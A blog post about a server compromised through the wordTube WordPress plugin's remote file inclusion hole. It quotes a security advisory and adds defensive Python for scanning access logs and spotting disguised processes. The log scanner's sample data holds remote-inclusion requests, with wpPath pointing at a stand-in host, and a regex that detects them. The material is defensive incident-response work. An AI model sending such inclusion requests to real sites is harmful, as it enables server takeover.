WordTube vulnerability broke my server

Today I woke up and upon checking my mail discovered that my server had gone down. A quick ps aux revealed some concealed processes running as ‘httpd’ but actually running some Perl script. The apache2 process wasn’t running any more. After killing the intruding processes I could start Apache again, but of course I wanted to find out what went wrong.

Looking through the log files I found someone trying to access /wp-content/plugins/wordtube/wordtube-button.php?wpPath=[someurl].

Turns out wordTube was exploitable. I finally found the exploit described on heise.de:

Three plugins for the popular blog software WordPress introduce a vulnerability into the system. There are security holes in myFlash, wordTube and wp-Table which an attacker can use to include his own PHP scripts and run them with the privileges of the web server. All three plugins are written by the same developer.

The problem in the plugins is the handling of the argument wppath in the files wordtube-button.php, js/wptable-button.php and myflash-button.php. All wordTube and wp-Table versions up to 1.4.3 and myFlash versions up to 1.10 are affected. The errors have been fixed in the respective versions 1.4.4 and 1.11. All users should download the newest versions as soon as possible.
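The advisory names the three scripts and the argument, and the log line above shows the pattern an access log holds after an attempt: a request to one of those button scripts with wpPath pointing at an external URL. The following scanner is an added example, not code from the post or from the plugins: it reads Apache combined-format log lines, flags requests to any of the three scripts whose wpPath/wppath value names a URL scheme or a PHP stream wrapper, and counts findings per client address. The sample log lines, addresses and timestamps are constructed for the example; matching on the script basename (rather than the full plugin path) is my choice, since the advisory gives the directory only for wordTube.

```python
import re
from urllib.parse import parse_qs, urlsplit

# The three button scripts the heise.de advisory names; matched by basename
# because the plugin directory layout is not given for all of them.
VULNERABLE_SCRIPTS = {"wordtube-button.php", "wptable-button.php", "myflash-button.php"}

# A wpPath value naming a URL scheme or a PHP stream wrapper is the
# remote-inclusion pattern seen in the post's log line (wpPath=[someurl]).
REMOTE_RE = re.compile(r"^(?:[a-z][a-z0-9+.\-]*://|php://|data:)", re.IGNORECASE)

# Apache "combined" access-log line; only the fields we report are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3}) \S+'
)

def classify_target(target: str):
    """Return (script, wppath_value) when the request hits one of the affected
    scripts with a wpPath/wppath argument pointing at a remote resource."""
    parts = urlsplit(target)
    script = parts.path.rsplit("/", 1)[-1].lower()
    if script not in VULNERABLE_SCRIPTS:
        return None
    # PHP's $_GET is case-sensitive, but the attacker controls the spelling,
    # so compare parameter names case-insensitively.
    params = {k.lower(): v for k, v in parse_qs(parts.query, keep_blank_values=True).items()}
    for value in params.get("wppath", []):
        if REMOTE_RE.match(value.strip()):
            return script, value
    return None

def scan_log(text: str):
    """Return one finding dict per suspicious request in an access log."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line (or a truncated one)
        found = classify_target(m.group("target"))
        if found:
            script, value = found
            hits.append({"ip": m.group("ip"), "time": m.group("ts"),
                         "script": script, "wppath": value,
                         "status": m.group("status")})
    return hits

def sources(hits):
    """Count findings per client address, to see who was probing."""
    counts = {}
    for h in hits:
        counts[h["ip"]] = counts.get(h["ip"], 0) + 1
    return counts

# Constructed sample log (documentation addresses, made-up timestamps), not
# the author's real log: two hits on wordtube-button.php (one URL-encoded),
# one on myflash-button.php, plus benign requests that must not be flagged.
SAMPLE_LOG = """\
203.0.113.7 - - [25/May/2007:03:14:02 +0200] "GET /wp-content/plugins/wordtube/wordtube-button.php?wpPath=http://198.51.100.9/x.txt? HTTP/1.1" 200 1432 "-" "Mozilla/4.0"
198.51.100.23 - - [25/May/2007:03:15:10 +0200] "GET /wp-content/plugins/wordtube/wordtube-button.php?wpPath=http%3A%2F%2F198.51.100.9%2Fx.txt%3F HTTP/1.1" 200 1432 "-" "libwww-perl/5.805"
192.0.2.44 - - [25/May/2007:09:00:01 +0200] "GET /wp-content/plugins/wordtube/wordtube-button.php HTTP/1.1" 200 88 "-" "Mozilla/5.0"
192.0.2.45 - - [25/May/2007:09:02:31 +0200] "GET /2007/05/some-post/ HTTP/1.1" 200 9182 "-" "Mozilla/5.0"
203.0.113.7 - - [25/May/2007:03:16:40 +0200] "GET /wp-content/plugins/myflash/myflash-button.php?wppath=ftp://198.51.100.9/ HTTP/1.1" 404 210 "-" "Mozilla/4.0"
"""

if __name__ == "__main__":
    hits = scan_log(SAMPLE_LOG)
    for h in hits:
        print(f'{h["time"]} {h["ip"]} {h["script"]} wpPath={h["wppath"]} -> {h["status"]}')
    print("per source:", sources(hits))
```

The status code matters when reading the output: a 200 on a request whose wpPath names a remote URL means the include was served, so the host on which that happened should be treated as compromised, as the post describes; a 404 only shows that the script was not present at that path. Values that stay on the local filesystem (for example a traversal string) are deliberately not flagged here, because the page documents the remote-URL form only.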


Comments

  • By , 25 May 2007 @ 16:26

    Hi,
    When you cleaned up your server, what kind of files were you looking for?

    I have been affected by wordtube on one of my sites as well.
    Thanks

  • By , 25 May 2007 @ 16:49

    @ajit: typically, look for files in /tmp/ and /var/tmp/.

    A security expert would say you’d have to redo your whole server, because the intruder could have planted whatever software really. But what I did was I checked ‘ps aux’ and it didn’t come up with any process that looked odd to me, and then I basically observed the traffic, and since I saw that it wasn’t unusually high, I’m assuming the intruder wasn’t able to do much harm.

    Actually on my server, they simply installed an IRC bot, which took up much traffic, but other than that didn’t do *my* server much harm.
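The two checks in this reply (look at ps aux for processes that seem odd, look for files in /tmp/ and /var/tmp/) and the post's observation of processes that show as ‘httpd’ but actually run a Perl script can be made mechanical. The following triage script is an added example, not code from the post or its commenters: it compares the name a process shows in ps (argv[0], which a script can rewrite) against the executable the kernel actually loaded (/proc/<pid>/exe, which it cannot), and flags anything running out of a temporary directory. The /dev/shm entry and the check for an executable that was unlinked after launch are my additions, not something the page mentions; the sample process list is constructed to mirror the post's description.

```python
import os
from dataclasses import dataclass

# Drop directories the comment says to check; /dev/shm is my addition,
# another commonly world-writable location.
SUSPECT_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")
INTERPRETERS = ("perl", "python", "sh", "bash", "php")

@dataclass
class Proc:
    pid: int
    user: str
    exe: str       # resolved /proc/<pid>/exe target ("" if unreadable)
    cmdline: str   # /proc/<pid>/cmdline with NULs replaced by spaces; what ps shows

def suspicion_reasons(p: Proc) -> list:
    """Reasons a process deserves a look; an empty list means nothing odd."""
    reasons = []
    argv = p.cmdline.split()
    claimed = os.path.basename(argv[0]) if argv else ""
    exe_base = os.path.basename(p.exe.replace(" (deleted)", ""))
    # ps shows argv[0], which a script can set to anything; the exe link
    # still points at the interpreter that is really running.
    if claimed.startswith(("httpd", "apache")) and exe_base.startswith(INTERPRETERS):
        reasons.append(f"shows as {claimed!r} but executes {exe_base}")
    # Binary or a script argument living in a temporary directory.
    if any(a.startswith(SUSPECT_DIRS) for a in [p.exe] + argv):
        reasons.append("runs from a temporary directory")
    # The kernel appends this marker when the executable was unlinked;
    # removing the dropped file after launch is a common way to hide it.
    if p.exe.endswith(" (deleted)"):
        reasons.append("executable was deleted from disk")
    return reasons

def triage(procs):
    """Return [(pid, user, reasons)] for every process with at least one reason."""
    out = []
    for p in procs:
        r = suspicion_reasons(p)
        if r:
            out.append((p.pid, p.user, r))
    return out

def read_proc():
    """Collect Proc records from a live Linux /proc (best effort; reading the
    exe link of another user's process needs root)."""
    import pwd  # Unix only, so imported here rather than at module level
    procs = []
    for name in os.listdir("/proc"):
        if not name.isdigit():
            continue
        base = f"/proc/{name}"
        try:
            user = pwd.getpwuid(os.stat(base).st_uid).pw_name
            with open(f"{base}/cmdline", "rb") as f:
                cmdline = f.read().replace(b"\0", b" ").decode(errors="replace").strip()
            try:
                exe = os.readlink(f"{base}/exe")
            except OSError:
                exe = ""
        except (OSError, KeyError):
            continue  # process exited meanwhile, or not readable
        procs.append(Proc(int(name), user, exe, cmdline))
    return procs

# Constructed sample modelled on the post's description; not real output.
SAMPLE_PROCS = [
    Proc(1201, "www-data", "/usr/sbin/apache2", "/usr/sbin/apache2 -k start"),
    Proc(1342, "www-data", "/usr/bin/perl", "httpd"),
    Proc(1355, "www-data", "/usr/bin/perl", "perl /var/tmp/.x/bot.pl"),
    Proc(1360, "www-data", "/tmp/.x/bot (deleted)", "/tmp/.x/bot"),
    Proc(800, "root", "/usr/sbin/sshd", "/usr/sbin/sshd -D"),
]

if __name__ == "__main__":
    # Swap SAMPLE_PROCS for read_proc() to run against a live system.
    for pid, user, reasons in triage(SAMPLE_PROCS):
        print(pid, user, "; ".join(reasons))
```

Run as root so that every exe link is readable; a process whose exe link cannot be read shows up with an empty exe and is therefore not compared. As the reply itself notes, a clean result from a check like this only means nothing obvious was found, not that the host is clean.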
